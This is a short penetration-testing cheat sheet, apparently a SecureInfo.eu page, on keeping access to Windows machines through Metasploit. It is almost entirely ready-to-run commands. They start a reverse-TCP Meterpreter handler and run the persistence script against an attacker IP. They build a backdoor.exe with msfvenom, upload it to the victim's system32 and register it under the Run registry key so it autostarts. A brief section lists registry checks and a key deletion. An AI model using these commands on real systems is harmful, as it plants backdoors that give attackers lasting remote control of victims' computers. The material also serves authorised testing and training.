Files

Persistence via MSFconsole

attacker > msfconsole >

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

run persistence -A -X -p 443 -r 172.43.203.131 # system
run persistence -A -U -p 443 -r 172.43.203.131 # user

reg setval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run  -v autorun  -d C:\\WINDOWS\\TEMP\\cNWRSvx.vbs

Registry checks

attacker > msfconsole >

# System
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

# Users
reg enumkey -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

# Delete
reg deletekey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\backdoor

Persistance via MSFVenom

attacker > shell $

msfvenom -a x86 --platform windows -p 'windows/meterpreter/reverse_tcp' lhost='172.43.203.132' lport='9999' -f exe > /tmp/backdoor.exe

victim > meterpreter >

upload /tmp/backdoor.exe C:\\WINDOWS\\system32\\
reg setval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run  -v autorun  -d C:\\WINDOWS\\system32\\backdoor.exe

attacker > msfconsole >

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.43.203.132
set LPORT 9999
run

[*] - SecureInfo.eu, /Pentest/Meterpreter - Persistence.md

Persistence via MSFconsole

Registry checks

Persistance via MSFVenom